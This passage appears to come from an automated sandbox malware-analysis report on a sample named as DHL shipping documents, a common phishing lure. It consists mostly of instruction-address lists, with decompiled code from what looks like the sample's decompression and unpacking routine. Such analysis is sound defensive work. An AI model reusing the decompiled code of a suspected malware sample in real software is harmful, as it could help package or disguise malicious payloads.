								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                        0x00407194
                        0x00407194
                        0x00407194
                        0x00407194
                        0x0040719a
                        0x0040719e
                        0x004071a2
                        0x004071ac
                        0x004071ba
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x004074c7
                        0x004074c7
                        0x004074cb
                        0x00000000
                        0x00000000
                        0x004074cd
                        0x004074d6
                        0x004074dc
                        0x004074df
                        0x004074e2
                        0x004074e5
                        0x004074e8
                        0x004074ee
                        0x00407507
                        0x0040750a
                        0x00407516
                        0x00407517
                        0x0040751a
                        0x004074f0
                        0x004074f0
                        0x004074ff
                        0x00407502
                        0x00407502
                        0x00407524
                        0x004074c4
                        0x004074c4
                        0x004074c4
                        0x004074c7
                        0x004074cb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407526
                        0x00407526
                        0x0040749f
                        0x004074a3
                        0x004075db
                        0x004075db
                        0x004075e5
                        0x004075ed
                        0x004075f4
                        0x004075f6
                        0x004075fd
                        0x00407601
                        0x00407601
                        0x004074a9
                        0x004074af
                        0x004074b6
                        0x004074be
                        0x004074be
                        0x004074c1
                        0x00000000
                        0x004074c1
                        0x0040752b
                        0x00407538
                        0x0040753b
                        0x00407447
                        0x00407447
                        0x00407447
                        0x00406be3
                        0x00406be3
                        0x00406be3
                        0x00406bec
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x00406bf2
                        0x00000000
                        0x00406bf9
                        0x00406bfd
                        0x00000000
                        0x00000000
                        0x00406c03
                        0x00406c06
                        0x00406c09
                        0x00406c0c
                        0x00406c10
                        0x00000000
                        0x00000000
                        0x00406c16
                        0x00406c16
                        0x00406c19
                        0x00406c1b
                        0x00406c1c
                        0x00406c1f
                        0x00406c21
                        0x00406c22
                        0x00406c24
                        0x00406c27
                        0x00406c2c
                        0x00406c31
                        0x00406c3a
                        0x00406c4d
                        0x00406c50
                        0x00406c5c
                        0x00406c84
                        0x00406c86
                        0x00406c94
                        0x00406c94
                        0x00406c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c88
                        0x00406c88
                        0x00406c8b
                        0x00406c8c
                        0x00406c8c
                        0x00000000
                        0x00406c88
                        0x00406c5e
                        0x00406c62
                        0x00406c67
                        0x00406c67
                        0x00406c70
                        0x00406c78
                        0x00406c7b
                        0x00000000
                        0x00406c81
                        0x00406c81
                        0x00000000
                        0x00406c81
                        0x00000000
                        0x00406c9e
                        0x00406c9e
                        0x00406ca2
                        0x0040754e
                        0x0040754e
                        0x00000000
                        0x0040754e
                        0x00406ca8
                        0x00406cab
                        0x00406cbb
                        0x00406cbe
                        0x00406cc1
                        0x00406cc1
                        0x00406cc1
                        0x00406cc4
                        0x00406cc8
                        0x00000000
                        0x00000000
                        0x00406cca
                        0x00406cca
                        0x00406cd0
                        0x00406cfa
                        0x00406d00
                        0x00406d07
                        0x00000000
                        0x00406d07
                        0x00406cd2
                        0x00406cd6
                        0x00406cd9
                        0x00406cde
                        0x00406cde
                        0x00406ce9
                        0x00406cf1
                        0x00406cf4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d39
                        0x00406d3f
                        0x00406d42
                        0x00406d4f
                        0x00406d57
                        0x00000000
                        0x00000000
                        0x00406d0e
                        0x00406d0e
                        0x00406d12
                        0x0040755d
                        0x0040755d
                        0x00000000
                        0x0040755d
                        0x00406d18
                        0x00406d1e
                        0x00406d29
                        0x00406d29
                        0x00406d29
                        0x00406d2c
                        0x00406d2f
                        0x00406d32
                        0x00406d37
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040741c
                        0x00407420
                        0x004075cf
                        0x004075cf
                        0x00000000
                        0x004075cf
                        0x00407426
                        0x0040742c
                        0x00407433
                        0x0040743b
                        0x0040743e
                        0x00407441
                        0x00407441
                        0x00407447
                        0x00407447
                        0x00000000
                        0x00000000
                        0x00406d5f
                        0x00406d5f
                        0x00406d61
                        0x00406d64
                        0x00406dd5
                        0x00406dd5
                        0x00406dd8
                        0x00406ddb
                        0x00406de2
                        0x00406dec
                        0x00000000
                        0x00406dec
                        0x00406d66
                        0x00406d66
                        0x00406d6a
                        0x00406d6d
                        0x00406d6f
                        0x00406d72
                        0x00406d75
                        0x00406d77
                        0x00406d7a
                        0x00406d7c
                        0x00406d81
                        0x00406d84
                        0x00406d87
                        0x00406d8b
                        0x00406d92
                        0x00406d95
                        0x00406d9c
                        0x00406da0
                        0x00406da8
                        0x00406da8
                        0x00406da8
                        0x00406da2
                        0x00406da2
                        0x00406da2
                        0x00406d97
                        0x00406d97
                        0x00406d97
                        0x00406dac
                        0x00406daf
                        0x00406dcd
                        0x00406dcd
                        0x00406dcf
                        0x00000000
                        0x00406db1
                        0x00406db1
                        0x00406db1
                        0x00406db4
                        0x00406db7
                        0x00406dba
                        0x00406dbc
                        0x00406dbc
                        0x00406dbc
                        0x00406dbf
                        0x00406dc2
                        0x00406dc4
                        0x00406dc5
                        0x00406dc8
                        0x00000000
                        0x00406dc8
                        0x00000000
                        0x00406ffe
                        0x00406ffe
                        0x00407002
                        0x00407020
                        0x00407020
                        0x00407023
                        0x0040702a
                        0x0040702d
                        0x00407030
                        0x00407033
                        0x00407036
                        0x00407039
                        0x0040703b
                        0x00407042
                        0x00407043
                        0x00407045
                        0x00407048
                        0x0040704b
                        0x0040704e
                        0x0040704e
                        0x00407053
                        0x00000000
                        0x00407053
                        0x00407004
                        0x00407004
                        0x00407007
                        0x0040700a
                        0x00407014
                        0x00000000
                        0x00000000
                        0x00407068
                        0x00407068
                        0x0040706c
                        0x0040708f
                        0x00407092
                        0x00407095
                        0x0040709f
                        0x0040706e
                        0x0040706e
                        0x00407071
                        0x00407074
                        0x00407077
                        0x00407084
                        0x00407087
                        0x00407087
                        0x00000000
                        0x00000000
                        0x004070ab
                        0x004070ab
                        0x004070af
                        0x00000000
                        0x00000000
                        0x004070b5
                        0x004070b5
                        0x004070b9
                        0x00000000
                        0x00000000
                        0x004070bf
                        0x004070bf
                        0x004070c1
                        0x004070c5
                        0x004070c5
                        0x004070c8
                        0x004070cc
                        0x00000000
                        0x00000000
                        0x0040711c
                        0x0040711c
                        0x00407120
                        0x00407127
                        0x00407127
                        0x0040712a
                        0x0040712d
                        0x00407137
                        0x00000000
                        0x00407137
                        0x00407122
                        0x00407122
                        0x00000000
                        0x00000000
                        0x00407143
                        0x00407143
                        0x00407147
                        0x0040714e
                        0x00407151
                        0x00407154
                        0x00407149
                        0x00407149
                        0x00407149
                        0x00407157
                        0x0040715a
                        0x0040715d
                        0x0040715d
                        0x00407160
                        0x00407163
                        0x00407166
                        0x00407166
                        0x00407169
                        0x00407170
                        0x00407175
                        0x00000000
                        0x00000000
                        0x00407203
                        0x00407203
                        0x00407207
                        0x004075a5
                        0x004075a5
                        0x00000000
                        0x004075a5
                        0x0040720d
                        0x0040720d
                        0x00407210
                        0x00407213
                        0x00407217
                        0x0040721a
                        0x00407220
                        0x00407222
                        0x00407222
                        0x00407222
                        0x00407225
                        0x00407228
                        0x00000000
                        0x00000000
                        0x00406df8
                        0x00406df8
                        0x00406dfc
                        0x00407569
                        0x00407569
                        0x00000000
                        0x00407569
                        0x00406e02
                        0x00406e02
                        0x00406e05
                        0x00406e08
                        0x00406e0c
                        0x00406e0f
                        0x00406e15
                        0x00406e17
                        0x00406e17
                        0x00406e17
                        0x00406e1a
                        0x00406e1d
                        0x00406e1d
                        0x00406e20
                        0x00406e23
                        0x00000000
                        0x00000000
                        0x00406e29
                        0x00406e29
                        0x00406e2f
                        0x00000000
                        0x00000000
                        0x00406e35
                        0x00406e35
                        0x00406e39
                        0x00406e3c
                        0x00406e3f
                        0x00406e42
                        0x00406e45
                        0x00406e46
                        0x00406e49
                        0x00406e4b
                        0x00406e51
                        0x00406e54
                        0x00406e57
                        0x00406e5a
                        0x00406e5d
                        0x00406e60
                        0x00406e63
                        0x00406e7f
                        0x00406e82
                        0x00406e85
                        0x00406e88
                        0x00406e8f
                        0x00406e93
                        0x00406e95
                        0x00406e99
                        0x00406e65
                        0x00406e65
                        0x00406e69
                        0x00406e71
                        0x00406e76
                        0x00406e78
                        0x00406e7a
                        0x00406e7a
                        0x00406e9c
                        0x00406ea3
                        0x00406ea6
                        0x00000000
                        0x00406eac
                        0x00406eac
                        0x00000000
                        0x00406eac
                        0x00000000
                        0x00406eb1
                        0x00406eb1
                        0x00406eb5
                        0x00407575
                        0x00407575
                        0x00000000
                        0x00407575
                        0x00406ebb
                        0x00406ebb
                        0x00406ebe
                        0x00406ec1
                        0x00406ec5
                        0x00406ec8
                        0x00406ece
                        0x00406ed0
                        0x00406ed0
                        0x00406ed0
                        0x00406ed3
                        0x00406ed6
                        0x00406ed6
                        0x00406ed6
                        0x00406edc
                        0x00000000
                        0x00000000
                        0x00406ede
                        0x00406ede
                        0x00406ee1
                        0x00406ee4
                        0x00406ee7
                        0x00406eea
                        0x00406eed
                        0x00406ef0
                        0x00406ef3
                        0x00406ef6
                        0x00406ef9
                        0x00406efc
                        0x00406f14
                        0x00406f17
                        0x00406f1a
                        0x00406f1d
                        0x00406f1d
                        0x00406f20
                        0x00406f24
                        0x00406f26
                        0x00406efe
                        0x00406efe
                        0x00406f06
                        0x00406f0b
                        0x00406f0d
                        0x00406f0f
                        0x00406f0f
                        0x00406f29
                        0x00406f30
                        0x00406f33
                        0x00000000
                        0x00406f35
                        0x00406f35
                        0x00000000
                        0x00406f35
                        0x00406f33
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00406f3a
                        0x00000000
                        0x00000000
                        0x00406f75
                        0x00406f75
                        0x00406f79
                        0x00407581
                        0x00407581
                        0x00000000
                        0x00407581
                        0x00406f7f
                        0x00406f7f
                        0x00406f82
                        0x00406f85
                        0x00406f89
                        0x00406f8c
                        0x00406f92
                        0x00406f94
                        0x00406f94
                        0x00406f94
                        0x00406f97
                        0x00406f9a
                        0x00406f9a
                        0x00406fa0
                        0x00406f3e
                        0x00406f3e
                        0x00406f41
                        0x00000000
                        0x00406f41
                        0x00406fa2
                        0x00406fa2
                        0x00406fa5
                        0x00406fa8
                        0x00406fab
                        0x00406fae
                        0x00406fb1
                        0x00406fb4
                        0x00406fb7
                        0x00406fba
                        0x00406fbd
                        0x00406fc0
                        0x00406fd8
                        0x00406fdb
                        0x00406fde
                        0x00406fe1
                        0x00406fe1
                        0x00406fe4
                        0x00406fe8
                        0x00406fea
                        0x00406fc2
                        0x00406fc2
                        0x00406fca
                        0x00406fcf
                        0x00406fd1
                        0x00406fd3
                        0x00406fd3
                        0x00406fed
                        0x00406ff4
                        0x00406ff7
                        0x00000000
                        0x00406ff9
                        0x00406ff9
                        0x00000000
                        0x00406ff9
                        0x00000000
                        0x00407286
                        0x00407286
                        0x0040728a
                        0x004075b1
                        0x004075b1
                        0x00000000
                        0x004075b1
                        0x00407290
                        0x00407290
                        0x00407293
                        0x00407296
                        0x0040729a
                        0x0040729d
                        0x004072a3
                        0x004072a5
                        0x004072a5
                        0x004072a5
                        0x004072a8
                        0x00000000
                        0x00000000
                        0x00407056
                        0x00407056
                        0x00407059
                        0x00000000
                        0x00000000
                        0x00407395
                        0x00407395
                        0x00407399
                        0x004073bb
                        0x004073bb
                        0x004073be
                        0x004073c8
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x0040739b
                        0x0040739b
                        0x0040739e
                        0x004073a2
                        0x004073a5
                        0x004073a5
                        0x004073a8
                        0x00000000
                        0x00000000
                        0x00407452
                        0x00407452
                        0x00407456
                        0x00407474
                        0x00407474
                        0x00407474
                        0x00407474
                        0x0040747b
                        0x00407482
                        0x00407489
                        0x00407489
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x0040749d
                        0x00407458
                        0x00407458
                        0x0040745b
                        0x0040745e
                        0x00407461
                        0x00407468
                        0x004073ac
                        0x004073ac
                        0x004073af
                        0x00000000
                        0x00000000
                        0x00407543
                        0x00407543
                        0x00407546
                        0x00407447
                        0x00407447
                        0x00407447
                        0x00000000
                        0x0040744d
                        0x00000000
                        0x0040717d
                        0x0040717d
                        0x0040717f
                        0x00407186
                        0x00407187
                        0x00407189
                        0x0040718c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00407490
                        0x00407490
                        0x00407493
                        0x0040749a
                        0x00000000
                        0x0040749d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004071c2
                        0x004071c2
                        0x004071c5
                        0x004071fb
                        0x004071fb
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732b
                        0x0040732e
                        0x0040732e
                        0x00407331
                        0x00407333
                        0x004075bd
                        0x004075bd
                        0x00000000
                        0x004075bd
                        0x00407339
                        0x00407339
                        0x0040733c
                        0x00000000
                        0x00000000
                        0x00407342
                        0x00407342
                        0x00407346
                        0x00407349
                        0x00407349
                        0x00407349
                        0x00000000
                        0x00407349
                        0x004071c7
                        0x004071c7
                        0x004071c9
                        0x004071cb
                        0x004071cd
                        0x004071d0
                        0x004071d1
                        0x004071d3
                        0x004071d5
                        0x004071d8
                        0x004071db
                        0x004071f1
                        0x004071f1
                        0x004071f6
                        0x0040722e
                        0x0040722e
                        0x00407232
                        0x0040725b
                        0x0040725e
                        0x00407260
                        0x00407267
                        0x0040726a
                        0x0040726d
                        0x0040726d
                        0x00407272
                        0x00407272
                        0x00407274
                        0x00407277
                        0x0040727e
                        0x00407281
                        0x004072ae
                        0x004072ae
                        0x004072b1
                        0x004072b4
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00407328
                        0x00000000
                        0x00407328
                        0x004072b6
                        0x004072b6
                        0x004072bc
                        0x004072bf
                        0x004072c2
                        0x004072c5
                        0x004072c8
                        0x004072cb
                        0x004072ce
                        0x004072d1
                        0x004072d4
                        0x004072d7
                        0x004072f0
                        0x004072f2
                        0x004072f5
                        0x004072f6
                        0x004072f9
                        0x004072fb
                        0x004072fe
                        0x00407300
                        0x00407302
                        0x00407305
                        0x00407307
                        0x0040730a
                        0x0040730e
                        0x00407310
                        0x00407310
                        0x00407311
                        0x00407314
                        0x00407317
                        0x004072d9
                        0x004072d9
                        0x004072e1
                        0x004072e6
                        0x004072e8
                        0x004072eb
                        0x004072eb
                        0x0040731a
                        0x00407321
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x004072ab
                        0x00000000
                        0x00407323
                        0x00407323
                        0x00000000
                        0x00407323
                        0x00407321
                        0x00407234
                        0x00407234
                        0x00407237
                        0x00407239
                        0x0040723c
                        0x0040723f
                        0x00407242
                        0x00407244
                        0x00407247
                        0x0040724a
                        0x0040724a
                        0x0040724d
                        0x0040724d
                        0x00407250
                        0x00407257
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x0040722b
                        0x00000000
                        0x00407259
                        0x00407259
                        0x00000000
                        0x00407259
                        0x00407257
                        0x004071dd
                        0x004071dd
                        0x004071e0
                        0x004071e2
                        0x004071e5
                        0x00000000
                        0x00000000
                        0x00406f44
                        0x00406f44
                        0x00406f48
                        0x0040758d
                        0x0040758d
                        0x00000000
                        0x0040758d
                        0x00406f4e
                        0x00406f4e
                        0x00406f51
                        0x00406f54
                        0x00406f57
                        0x00406f5a
                        0x00406f5d
                        0x00406f60
                        0x00406f62
                        0x00406f65
                        0x00406f68
                        0x00406f6b
                        0x00406f6d
                        0x00406f6d
                        0x00406f6d
                        0x00000000
                        0x00000000
                        0x004070cf
                        0x004070cf
                        0x004070d3
                        0x00407599
                        0x00407599
                        0x00000000
                        0x00407599
                        0x004070d9
                        0x004070d9
                        0x004070dc
                        0x004070df
                        0x004070e2
                        0x004070e4
                        0x004070e4
                        0x004070e4
                        0x004070e7
                        0x004070ea
                        0x004070ed
                        0x004070f0
                        0x004070f3
                        0x004070f6
                        0x004070f7
                        0x004070f9
                        0x004070f9
                        0x004070f9
                        0x004070fc
                        0x004070ff
                        0x00407102
                        0x00407105
                        0x00407105
                        0x00407105
                        0x00407108
                        0x0040710a
                        0x0040710a
                        0x00000000
                        0x00000000
                        0x0040734c
                        0x0040734c
                        0x0040734c
                        0x00407350
                        0x00000000
                        0x00000000
                        0x00407356
                        0x00407356
                        0x00407359
                        0x0040735c
                        0x0040735f
                        0x00407361
                        0x00407361
                        0x00407361
                        0x00407364
                        0x00407367
                        0x0040736a
                        0x0040736d
                        0x00407370
                        0x00407373
                        0x00407374
                        0x00407376
                        0x00407376
                        0x00407376
                        0x00407379
                        0x0040737c
                        0x0040737f
                        0x00407382
                        0x00407385
                        0x00407389
                        0x0040738b
                        0x0040738e
                        0x00000000
                        0x00407390
                        0x00407390
                        0x0040710d
                        0x0040710d
                        0x00000000
                        0x0040710d
                        0x0040738e
                        0x004075c3
                        0x004075c3
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x004075fa
                        0x004075fa
                        0x00000000
                        0x004075fa
                        0x00407447
                        0x004074c7
                        0x00407490

                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                        • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                        • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                        • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
